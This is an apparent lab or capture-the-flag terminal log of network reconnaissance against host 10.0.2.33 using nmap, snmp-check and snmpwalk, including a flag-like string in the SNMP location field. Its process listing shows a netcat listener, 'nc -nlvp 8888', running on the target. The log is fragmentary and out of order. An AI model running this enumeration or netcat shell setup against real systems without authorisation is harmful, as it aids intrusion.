 /dev/shm
 /run/lock
 /sys/fs/cgroup
 /boot

 [*] Enumerated 10.0.2.33 in 3.85 seconds
Signal USR1 received in thread 1, but no signal handler set. at /usr/bin/snmp-check line 230.

root@kali2:~# nmap -sV 10.0.2.33 -p- -T4

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 09:34 PST
Nmap scan report for 10.0.2.33
Host is up (0.00033s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE       VERSION
22/tcp    open  tcpwrapped
4848/tcp  open  appserv-http?
12345/tcp open  netbus?


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.44 seconds
root@kali2:~# ping 10.0.2.33
PING 10.0.2.33 (10.0.2.33) 56(84) bytes of data.
64 bytes from 10.0.2.33: icmp_seq=1 ttl=63 time=0.484 ms
64 bytes from 10.0.2.33: icmp_seq=2 ttl=63 time=0.465 ms
64 bytes from 10.0.2.33: icmp_seq=3 ttl=63 time=0.464 ms
64 bytes from 10.0.2.33: icmp_seq=4 ttl=63 time=0.528 ms
^C
--- 10.0.2.33 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3002ms
rtt min/avg/max/mdev = 0.464/0.485/0.528/0.030 ms



 [*] Network information
 -----------------------------------------------------------------------------------------------

 IP forwarding enabled   : no
 Default TTL             : 64
 TCP segments received   : 63274
 TCP segments sent       : 56762
 TCP segments retrans.   : 133
 Input datagrams         : 447293
 Delivered datagrams     : 434967
 Output datagrams        : 428890

 [*] Network interfaces
 -----------------------------------------------------------------------------------------------

 Interface               : [ up ] lo

    Interface Speed  : 10 Mbps
    IP Address       : 10.0.2.33
    Netmask          : 255.255.255.0
    MTU              : 65536
    Bytes In         : 12361 (13K)
    Bytes Out        : 12361 (13K)

 Interface               : [ up ] VMware VMXNET3 Ethernet Controller

    Hardware Address : 00:0c:29:d1:04:53
    Interface Speed  : 4294.967295 Mbps
    IP Address       : 127.0.0.1
    Netmask          : 255.0.0.0
    MTU              : 1500
    Bytes In         : 44268065 (43M)
    Bytes Out        : 46057596 (44M)


 [*] Routing information
 -----------------------------------------------------------------------------------------------

      Destination      Next Hop           Mask    Metric

          0.0.0.0       10.0.2.254          0.0.0.0        1

 [*] Listening TCP ports and connections
 -----------------------------------------------------------------------------------------------

   Local Address   Port      Remote Address   Port       State

         0.0.0.0  12345             0.0.0.0      -       Listening
         0.0.0.0     22             0.0.0.0      -       Listening
         0.0.0.0   4848             0.0.0.0      -       Listening

 [*] Listening UDP ports
 -----------------------------------------------------------------------------------------------

   Local Address   Port

         0.0.0.0    161
         0.0.0.0  39876
         0.0.0.0  52793
         0.0.0.0     69
       10.0.2.33     53

 
 [*] Mountpoints
 -----------------------------------------------------------------------------------------------

 /
 /run
 /dev/shm
 /run/lock
 /sys/fs/cgroup
 /boot
 /run/user/1001

 [*] Enumerated 10.0.2.33 in 2.71 seconds
Signal USR1 received in thread 1, but no signal handler set. at /usr/bin/snmp-check line 230.
 

root@kali2:~# snmp-check -t 10.0.2.33 -c private
snmpcheck v1.8 - SNMP enumerator
Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org)

 [*] Try to connect to 10.0.2.33
 [*] Connected to 10.0.2.33
 [*] Starting enumeration at 2017-11-05 13:54:05
 [*] Error: No response from remote host "10.0.2.33".
Signal USR1 received in thread 1, but no signal handler set. at /usr/bin/snmp-check line 320.
root@kali2:~# snmpwalk -v2c -c public 10.0.2.33
iso.3.6.1.2.1.1.1.0 = STRING: "Linux basic 4.4.0-97-generic #120-Ubuntu SMP Tue Sep 19 17:28:18 UTC 2017 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (11722) 0:01:57.22
iso.3.6.1.2.1.1.4.0 = STRING: "nobody@example.org"
iso.3.6.1.2.1.1.5.0 = STRING: "basic"
iso.3.6.1.2.1.1.6.0 = STRING: "blizzard{p@5$w0rd.txt}"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."

iso.3.6.1.2.1.6.13.1.4.10.0.2.33.22.10.0.4.81.36638 = IpAddress: 10.0.4.81
iso.3.6.1.2.1.6.13.1.4.10.0.2.33.22.10.0.4.233.47448 = IpAddress: 10.0.4.233

iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-4.4.0-97-generic root=/dev/mapper/basic--vg-root ro
"

iso.3.6.1.2.1.25.2.3.1.2.62 = OID: iso.3.6.1.2.1.25.2.1.4
iso.3.6.1.2.1.25.2.3.1.3.1 = STRING: "Physical memory"
iso.3.6.1.2.1.25.2.3.1.3.3 = STRING: "Virtual memory"
iso.3.6.1.2.1.25.2.3.1.3.6 = STRING: "Memory buffers"
iso.3.6.1.2.1.25.2.3.1.3.7 = STRING: "Cached memory"
iso.3.6.1.2.1.25.2.3.1.3.8 = STRING: "Shared memory"
iso.3.6.1.2.1.25.2.3.1.3.10 = STRING: "Swap space"
iso.3.6.1.2.1.25.2.3.1.3.31 = STRING: "/"
iso.3.6.1.2.1.25.2.3.1.3.37 = STRING: "/run"
iso.3.6.1.2.1.25.2.3.1.3.39 = STRING: "/dev/shm"
iso.3.6.1.2.1.25.2.3.1.3.40 = STRING: "/run/lock"
iso.3.6.1.2.1.25.2.3.1.3.41 = STRING: "/sys/fs/cgroup"
iso.3.6.1.2.1.25.2.3.1.3.59 = STRING: "/boot"
iso.3.6.1.2.1.25.2.3.1.3.61 = STRING: "/run/user/1003"
iso.3.6.1.2.1.25.2.3.1.3.62 = STRING: "/run/user/1001"
iso.3.6.1.2.1.25.2.3.1.4.1 = INTEGER: 1024

iso.3.6.1.2.1.25.3.2.1.1.196608 = INTEGER: 196608
iso.3.6.1.2.1.25.3.2.1.1.196609 = INTEGER: 196609
iso.3.6.1.2.1.25.3.2.1.1.262145 = INTEGER: 262145
iso.3.6.1.2.1.25.3.2.1.1.262146 = INTEGER: 262146
iso.3.6.1.2.1.25.3.2.1.1.786432 = INTEGER: 786432
iso.3.6.1.2.1.25.3.2.1.2.196608 = OID: iso.3.6.1.2.1.25.3.1.3
iso.3.6.1.2.1.25.3.2.1.2.196609 = OID: iso.3.6.1.2.1.25.3.1.3
iso.3.6.1.2.1.25.3.2.1.2.262145 = OID: iso.3.6.1.2.1.25.3.1.4
iso.3.6.1.2.1.25.3.2.1.2.262146 = OID: iso.3.6.1.2.1.25.3.1.4
iso.3.6.1.2.1.25.3.2.1.2.786432 = OID: iso.3.6.1.2.1.25.3.1.12
iso.3.6.1.2.1.25.3.2.1.3.196608 = STRING: "GenuineIntel: Intel(R) Core(TM) i7-3770K CPU @ 3.50GHz"
iso.3.6.1.2.1.25.3.2.1.3.196609 = STRING: "GenuineIntel: Intel(R) Core(TM) i7-3770K CPU @ 3.50GHz"
iso.3.6.1.2.1.25.3.2.1.3.262145 = STRING: "network interface lo"
iso.3.6.1.2.1.25.3.2.1.3.262146 = STRING: "network interface ens160"
iso.3.6.1.2.1.25.3.2.1.3.786432 = STRING: "Guessing that there's a floating point co-processor"

iso.3.6.1.2.1.25.3.8.1.1.10 = INTEGER: 10
iso.3.6.1.2.1.25.3.8.1.1.11 = INTEGER: 11
iso.3.6.1.2.1.25.3.8.1.1.29 = INTEGER: 29
iso.3.6.1.2.1.25.3.8.1.1.31 = INTEGER: 31
iso.3.6.1.2.1.25.3.8.1.1.32 = INTEGER: 32
iso.3.6.1.2.1.25.3.8.1.2.1 = STRING: "/"
iso.3.6.1.2.1.25.3.8.1.2.7 = STRING: "/run"
iso.3.6.1.2.1.25.3.8.1.2.9 = STRING: "/dev/shm"
iso.3.6.1.2.1.25.3.8.1.2.10 = STRING: "/run/lock"
iso.3.6.1.2.1.25.3.8.1.2.11 = STRING: "/sys/fs/cgroup"
iso.3.6.1.2.1.25.3.8.1.2.29 = STRING: "/boot"
iso.3.6.1.2.1.25.3.8.1.2.31 = STRING: "/run/user/1003"
iso.3.6.1.2.1.25.3.8.1.2.32 = STRING: "/run/user/1001"
iso.3.6.1.2.1.25.3.8.1.3.1 = ""

iso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "systemd"
iso.3.6.1.2.1.25.4.2.1.2.2 = STRING: "kthreadd"
iso.3.6.1.2.1.25.4.2.1.2.3 = STRING: "ksoftirqd/0"
iso.3.6.1.2.1.25.4.2.1.2.4 = STRING: "kworker/0:0"
iso.3.6.1.2.1.25.4.2.1.2.5 = STRING: "kworker/0:0H"
iso.3.6.1.2.1.25.4.2.1.2.6 = STRING: "kworker/u4:0"
iso.3.6.1.2.1.25.4.2.1.2.7 = STRING: "rcu_sched"
iso.3.6.1.2.1.25.4.2.1.2.8 = STRING: "rcu_bh"
iso.3.6.1.2.1.25.4.2.1.2.9 = STRING: "migration/0"
iso.3.6.1.2.1.25.4.2.1.2.10 = STRING: "watchdog/0"
iso.3.6.1.2.1.25.4.2.1.2.11 = STRING: "watchdog/1"
iso.3.6.1.2.1.25.4.2.1.2.12 = STRING: "migration/1"
iso.3.6.1.2.1.25.4.2.1.2.13 = STRING: "ksoftirqd/1"
iso.3.6.1.2.1.25.4.2.1.2.14 = STRING: "kworker/1:0"
iso.3.6.1.2.1.25.4.2.1.2.15 = STRING: "kworker/1:0H"
iso.3.6.1.2.1.25.4.2.1.2.16 = STRING: "kdevtmpfs"
iso.3.6.1.2.1.25.4.2.1.2.17 = STRING: "netns"
iso.3.6.1.2.1.25.4.2.1.2.18 = STRING: "perf"
iso.3.6.1.2.1.25.4.2.1.2.19 = STRING: "khungtaskd"
iso.3.6.1.2.1.25.4.2.1.2.20 = STRING: "writeback"
iso.3.6.1.2.1.25.4.2.1.2.21 = STRING: "ksmd"
iso.3.6.1.2.1.25.4.2.1.2.22 = STRING: "khugepaged"
iso.3.6.1.2.1.25.4.2.1.2.23 = STRING: "crypto"
iso.3.6.1.2.1.25.4.2.1.2.24 = STRING: "kintegrityd"
iso.3.6.1.2.1.25.4.2.1.2.25 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.26 = STRING: "kblockd"
iso.3.6.1.2.1.25.4.2.1.2.27 = STRING: "ata_sff"
iso.3.6.1.2.1.25.4.2.1.2.28 = STRING: "md"
iso.3.6.1.2.1.25.4.2.1.2.29 = STRING: "devfreq_wq"
iso.3.6.1.2.1.25.4.2.1.2.30 = STRING: "kworker/u4:1"
iso.3.6.1.2.1.25.4.2.1.2.31 = STRING: "kworker/1:1"
iso.3.6.1.2.1.25.4.2.1.2.32 = STRING: "kworker/0:1"
iso.3.6.1.2.1.25.4.2.1.2.34 = STRING: "kswapd0"
iso.3.6.1.2.1.25.4.2.1.2.35 = STRING: "vmstat"
iso.3.6.1.2.1.25.4.2.1.2.36 = STRING: "fsnotify_mark"
iso.3.6.1.2.1.25.4.2.1.2.37 = STRING: "ecryptfs-kthrea"
iso.3.6.1.2.1.25.4.2.1.2.53 = STRING: "kthrotld"
iso.3.6.1.2.1.25.4.2.1.2.54 = STRING: "acpi_thermal_pm"
iso.3.6.1.2.1.25.4.2.1.2.55 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.56 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.57 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.58 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.59 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.60 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.61 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.62 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.63 = STRING: "scsi_eh_0"
iso.3.6.1.2.1.25.4.2.1.2.64 = STRING: "scsi_tmf_0"
iso.3.6.1.2.1.25.4.2.1.2.65 = STRING: "scsi_eh_1"
iso.3.6.1.2.1.25.4.2.1.2.66 = STRING: "scsi_tmf_1"
iso.3.6.1.2.1.25.4.2.1.2.67 = STRING: "kworker/u4:2"
iso.3.6.1.2.1.25.4.2.1.2.68 = STRING: "kworker/u4:3"
iso.3.6.1.2.1.25.4.2.1.2.72 = STRING: "ipv6_addrconf"
iso.3.6.1.2.1.25.4.2.1.2.73 = STRING: "kworker/0:2"
iso.3.6.1.2.1.25.4.2.1.2.75 = STRING: "kworker/u4:4"
iso.3.6.1.2.1.25.4.2.1.2.87 = STRING: "deferwq"
iso.3.6.1.2.1.25.4.2.1.2.88 = STRING: "charger_manager"
iso.3.6.1.2.1.25.4.2.1.2.89 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.148 = STRING: "mpt_poll_0"
iso.3.6.1.2.1.25.4.2.1.2.149 = STRING: "mpt/0"
iso.3.6.1.2.1.25.4.2.1.2.150 = STRING: "kpsmoused"
iso.3.6.1.2.1.25.4.2.1.2.180 = STRING: "scsi_eh_2"
iso.3.6.1.2.1.25.4.2.1.2.181 = STRING: "scsi_tmf_2"
iso.3.6.1.2.1.25.4.2.1.2.182 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.183 = STRING: "ttm_swap"
iso.3.6.1.2.1.25.4.2.1.2.268 = STRING: "raid5wq"
iso.3.6.1.2.1.25.4.2.1.2.292 = STRING: "kdmflush"
iso.3.6.1.2.1.25.4.2.1.2.293 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.302 = STRING: "kdmflush"
iso.3.6.1.2.1.25.4.2.1.2.303 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.321 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.345 = STRING: "jbd2/dm-0-8"
iso.3.6.1.2.1.25.4.2.1.2.346 = STRING: "ext4-rsv-conver"
iso.3.6.1.2.1.25.4.2.1.2.395 = STRING: "kworker/0:1H"
iso.3.6.1.2.1.25.4.2.1.2.399 = STRING: "iscsi_eh"
iso.3.6.1.2.1.25.4.2.1.2.407 = STRING: "kworker/0:3"
iso.3.6.1.2.1.25.4.2.1.2.408 = STRING: "systemd-journal"
iso.3.6.1.2.1.25.4.2.1.2.412 = STRING: "kworker/1:2"
iso.3.6.1.2.1.25.4.2.1.2.424 = STRING: "kauditd"
iso.3.6.1.2.1.25.4.2.1.2.438 = STRING: "ib_addr"
iso.3.6.1.2.1.25.4.2.1.2.440 = STRING: "ib_mcast"
iso.3.6.1.2.1.25.4.2.1.2.441 = STRING: "ib_nl_sa_wq"
iso.3.6.1.2.1.25.4.2.1.2.442 = STRING: "lvmetad"
iso.3.6.1.2.1.25.4.2.1.2.443 = STRING: "ib_cm"
iso.3.6.1.2.1.25.4.2.1.2.449 = STRING: "iw_cm_wq"
iso.3.6.1.2.1.25.4.2.1.2.451 = STRING: "rdma_cm"
iso.3.6.1.2.1.25.4.2.1.2.468 = STRING: "systemd-udevd"
iso.3.6.1.2.1.25.4.2.1.2.629 = STRING: "kworker/1:3"
iso.3.6.1.2.1.25.4.2.1.2.843 = STRING: "ext4-rsv-conver"
iso.3.6.1.2.1.25.4.2.1.2.867 = STRING: "systemd-timesyn"
iso.3.6.1.2.1.25.4.2.1.2.1003 = STRING: "atd"
iso.3.6.1.2.1.25.4.2.1.2.1006 = STRING: "vmtoolsd"
iso.3.6.1.2.1.25.4.2.1.2.1008 = STRING: "rsyslogd"
iso.3.6.1.2.1.25.4.2.1.2.1009 = STRING: "cron"
iso.3.6.1.2.1.25.4.2.1.2.1014 = STRING: "accounts-daemon"
iso.3.6.1.2.1.25.4.2.1.2.1015 = STRING: "systemd-logind"
iso.3.6.1.2.1.25.4.2.1.2.1017 = STRING: "lxcfs"
iso.3.6.1.2.1.25.4.2.1.2.1022 = STRING: "kworker/1:4"
iso.3.6.1.2.1.25.4.2.1.2.1026 = STRING: "dbus-daemon"
iso.3.6.1.2.1.25.4.2.1.2.1074 = STRING: "acpid"
iso.3.6.1.2.1.25.4.2.1.2.1079 = STRING: "snapd"
iso.3.6.1.2.1.25.4.2.1.2.1090 = STRING: "mdadm"
iso.3.6.1.2.1.25.4.2.1.2.1094 = STRING: "polkitd"
iso.3.6.1.2.1.25.4.2.1.2.1121 = STRING: "kworker/1:1H"
iso.3.6.1.2.1.25.4.2.1.2.1189 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.1191 = STRING: "named"
iso.3.6.1.2.1.25.4.2.1.2.1193 = STRING: "php"
iso.3.6.1.2.1.25.4.2.1.2.1195 = STRING: "php"
iso.3.6.1.2.1.25.4.2.1.2.1198 = STRING: "python"
iso.3.6.1.2.1.25.4.2.1.2.1217 = STRING: "iscsid"
iso.3.6.1.2.1.25.4.2.1.2.1218 = STRING: "iscsid"
iso.3.6.1.2.1.25.4.2.1.2.1235 = STRING: "kworker/0:4"
iso.3.6.1.2.1.25.4.2.1.2.1278 = STRING: "atftpd"
iso.3.6.1.2.1.25.4.2.1.2.1284 = STRING: "inetutils-inetd"
iso.3.6.1.2.1.25.4.2.1.2.1287 = STRING: "irqbalance"
iso.3.6.1.2.1.25.4.2.1.2.1299 = STRING: "agetty"
iso.3.6.1.2.1.25.4.2.1.2.1315 = STRING: "snmpd"
iso.3.6.1.2.1.25.4.2.1.2.1374 = STRING: "systemd-network"
iso.3.6.1.2.1.25.4.2.1.2.1472 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.1615 = STRING: "systemd"
iso.3.6.1.2.1.25.4.2.1.2.1626 = STRING: "(sd-pam)"
iso.3.6.1.2.1.25.4.2.1.2.1704 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.1705 = STRING: "bash"
iso.3.6.1.2.1.25.4.2.1.2.1888 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.1907 = STRING: "systemd"
iso.3.6.1.2.1.25.4.2.1.2.1908 = STRING: "(sd-pam)"
iso.3.6.1.2.1.25.4.2.1.2.1941 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.1942 = STRING: "lshell"
iso.3.6.1.2.1.25.4.2.1.2.2033 = STRING: "sh"
iso.3.6.1.2.1.25.4.2.1.2.2034 = STRING: "nc"
iso.3.6.1.2.1.25.4.2.1.3.1 = OID: ccitt.0

iso.3.6.1.2.1.25.4.2.1.4.408 = STRING: "/lib/systemd/systemd-journald"
iso.3.6.1.2.1.25.4.2.1.4.412 = ""
iso.3.6.1.2.1.25.4.2.1.4.424 = ""
iso.3.6.1.2.1.25.4.2.1.4.438 = ""
iso.3.6.1.2.1.25.4.2.1.4.440 = ""
iso.3.6.1.2.1.25.4.2.1.4.441 = ""
iso.3.6.1.2.1.25.4.2.1.4.442 = STRING: "/sbin/lvmetad"
iso.3.6.1.2.1.25.4.2.1.4.443 = ""
iso.3.6.1.2.1.25.4.2.1.4.449 = ""
iso.3.6.1.2.1.25.4.2.1.4.451 = ""
iso.3.6.1.2.1.25.4.2.1.4.468 = STRING: "/lib/systemd/systemd-udevd"
iso.3.6.1.2.1.25.4.2.1.4.629 = ""
iso.3.6.1.2.1.25.4.2.1.4.843 = ""
iso.3.6.1.2.1.25.4.2.1.4.867 = STRING: "/lib/systemd/systemd-timesyncd"
iso.3.6.1.2.1.25.4.2.1.4.1003 = STRING: "/usr/sbin/atd"
iso.3.6.1.2.1.25.4.2.1.4.1006 = STRING: "/usr/bin/vmtoolsd"
iso.3.6.1.2.1.25.4.2.1.4.1008 = STRING: "/usr/sbin/rsyslogd"
iso.3.6.1.2.1.25.4.2.1.4.1009 = STRING: "/usr/sbin/cron"
iso.3.6.1.2.1.25.4.2.1.4.1014 = STRING: "/usr/lib/accountsservice/accounts-daemon"
iso.3.6.1.2.1.25.4.2.1.4.1015 = STRING: "/lib/systemd/systemd-logind"
iso.3.6.1.2.1.25.4.2.1.4.1017 = STRING: "/usr/bin/lxcfs"
iso.3.6.1.2.1.25.4.2.1.4.1022 = ""
iso.3.6.1.2.1.25.4.2.1.4.1026 = STRING: "/usr/bin/dbus-daemon"
iso.3.6.1.2.1.25.4.2.1.4.1074 = STRING: "/usr/sbin/acpid"
iso.3.6.1.2.1.25.4.2.1.4.1079 = STRING: "/usr/lib/snapd/snapd"
iso.3.6.1.2.1.25.4.2.1.4.1090 = STRING: "/sbin/mdadm"
iso.3.6.1.2.1.25.4.2.1.4.1094 = STRING: "/usr/lib/policykit-1/polkitd"
iso.3.6.1.2.1.25.4.2.1.4.1121 = ""
iso.3.6.1.2.1.25.4.2.1.4.1189 = STRING: "/usr/sbin/sshd"
iso.3.6.1.2.1.25.4.2.1.4.1191 = STRING: "/usr/sbin/named"
iso.3.6.1.2.1.25.4.2.1.4.1193 = STRING: "/usr/bin/php"
iso.3.6.1.2.1.25.4.2.1.4.1195 = STRING: "/usr/bin/php"
iso.3.6.1.2.1.25.4.2.1.4.1198 = STRING: "/usr/bin/python"
iso.3.6.1.2.1.25.4.2.1.4.1217 = STRING: "/sbin/iscsid"
iso.3.6.1.2.1.25.4.2.1.4.1218 = STRING: "/sbin/iscsid"
iso.3.6.1.2.1.25.4.2.1.4.1235 = ""
iso.3.6.1.2.1.25.4.2.1.4.1278 = STRING: "/usr/sbin/atftpd"
iso.3.6.1.2.1.25.4.2.1.4.1284 = STRING: "/usr/sbin/inetutils-inetd"
iso.3.6.1.2.1.25.4.2.1.4.1287 = STRING: "/usr/sbin/irqbalance"
iso.3.6.1.2.1.25.4.2.1.4.1299 = STRING: "/sbin/agetty"
iso.3.6.1.2.1.25.4.2.1.4.1315 = STRING: "/usr/sbin/snmpd"
iso.3.6.1.2.1.25.4.2.1.4.1374 = STRING: "/lib/systemd/systemd-networkd"
iso.3.6.1.2.1.25.4.2.1.4.1472 = STRING: "sshd: sombra [priv]"
iso.3.6.1.2.1.25.4.2.1.4.1615 = STRING: "/lib/systemd/systemd"
iso.3.6.1.2.1.25.4.2.1.4.1626 = STRING: "(sd-pam)"
iso.3.6.1.2.1.25.4.2.1.4.1704 = STRING: "sshd: sombra@pts/0"
iso.3.6.1.2.1.25.4.2.1.4.1705 = STRING: "-bash"
iso.3.6.1.2.1.25.4.2.1.4.1888 = STRING: "sshd: tracer [priv]"
iso.3.6.1.2.1.25.4.2.1.4.1907 = STRING: "/lib/systemd/systemd"
iso.3.6.1.2.1.25.4.2.1.4.1908 = STRING: "(sd-pam)"
iso.3.6.1.2.1.25.4.2.1.4.1941 = STRING: "sshd: tracer@pts/1"
iso.3.6.1.2.1.25.4.2.1.4.1942 = STRING: "/usr/bin/python"
iso.3.6.1.2.1.25.4.2.1.4.2033 = STRING: "/bin/sh"
iso.3.6.1.2.1.25.4.2.1.4.2034 = STRING: "nc"

iso.3.6.1.2.1.25.4.2.1.5.407 = ""
iso.3.6.1.2.1.25.4.2.1.5.408 = ""
iso.3.6.1.2.1.25.4.2.1.5.412 = ""
iso.3.6.1.2.1.25.4.2.1.5.424 = ""
iso.3.6.1.2.1.25.4.2.1.5.438 = ""
iso.3.6.1.2.1.25.4.2.1.5.440 = ""
iso.3.6.1.2.1.25.4.2.1.5.441 = ""
iso.3.6.1.2.1.25.4.2.1.5.442 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.443 = ""
iso.3.6.1.2.1.25.4.2.1.5.449 = ""
iso.3.6.1.2.1.25.4.2.1.5.451 = ""
iso.3.6.1.2.1.25.4.2.1.5.468 = ""
iso.3.6.1.2.1.25.4.2.1.5.629 = ""
iso.3.6.1.2.1.25.4.2.1.5.843 = ""
iso.3.6.1.2.1.25.4.2.1.5.867 = ""
iso.3.6.1.2.1.25.4.2.1.5.1003 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.1006 = ""
iso.3.6.1.2.1.25.4.2.1.5.1008 = STRING: "-n"
iso.3.6.1.2.1.25.4.2.1.5.1009 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.1014 = ""
iso.3.6.1.2.1.25.4.2.1.5.1015 = ""
iso.3.6.1.2.1.25.4.2.1.5.1017 = STRING: "/var/lib/lxcfs/"
iso.3.6.1.2.1.25.4.2.1.5.1022 = ""
iso.3.6.1.2.1.25.4.2.1.5.1026 = STRING: "--system --address=systemd: --nofork --nopidfile --systemd-activation"
iso.3.6.1.2.1.25.4.2.1.5.1074 = ""
iso.3.6.1.2.1.25.4.2.1.5.1079 = ""
iso.3.6.1.2.1.25.4.2.1.5.1090 = STRING: "--monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog"
iso.3.6.1.2.1.25.4.2.1.5.1094 = STRING: "--no-debug"
iso.3.6.1.2.1.25.4.2.1.5.1121 = ""
iso.3.6.1.2.1.25.4.2.1.5.1189 = STRING: "-D"
iso.3.6.1.2.1.25.4.2.1.5.1191 = STRING: "-f -u bind"
iso.3.6.1.2.1.25.4.2.1.5.1193 = STRING: "-S 0.0.0.0:4848 -t /home/pingpwn/www"
iso.3.6.1.2.1.25.4.2.1.5.1195 = STRING: "-S 0.0.0.0:12345 -t /home/agentdb/www"
iso.3.6.1.2.1.25.4.2.1.5.1198 = STRING: "/root/listen.py"
iso.3.6.1.2.1.25.4.2.1.5.1217 = ""
iso.3.6.1.2.1.25.4.2.1.5.1218 = ""
iso.3.6.1.2.1.25.4.2.1.5.1235 = ""
iso.3.6.1.2.1.25.4.2.1.5.1278 = STRING: "--daemon --tftpd-timeout 60 --retry-timeout 5 --maxthread 200 --verbose=5 --port=52793 /srv/tftp"
iso.3.6.1.2.1.25.4.2.1.5.1284 = ""
iso.3.6.1.2.1.25.4.2.1.5.1287 = STRING: "--pid=/var/run/irqbalance.pid"
iso.3.6.1.2.1.25.4.2.1.5.1299 = STRING: "--noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.1315 = STRING: "-Lsd -Lf /dev/null -u snmp -g snmp -I -smux mteTrigger mteTriggerConf -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.1374 = ""
iso.3.6.1.2.1.25.4.2.1.5.1472 = ""
iso.3.6.1.2.1.25.4.2.1.5.1615 = STRING: "--user"
iso.3.6.1.2.1.25.4.2.1.5.1626 = ""
iso.3.6.1.2.1.25.4.2.1.5.1704 = ""
iso.3.6.1.2.1.25.4.2.1.5.1705 = ""
iso.3.6.1.2.1.25.4.2.1.5.1888 = ""
iso.3.6.1.2.1.25.4.2.1.5.1907 = STRING: "--user"
iso.3.6.1.2.1.25.4.2.1.5.1908 = ""
iso.3.6.1.2.1.25.4.2.1.5.1941 = ""
iso.3.6.1.2.1.25.4.2.1.5.1942 = STRING: "/usr/bin/lshell"
iso.3.6.1.2.1.25.4.2.1.5.2033 = STRING: "-c nc -nlvp 8888"
iso.3.6.1.2.1.25.4.2.1.5.2034 = STRING: "-nlvp 8888"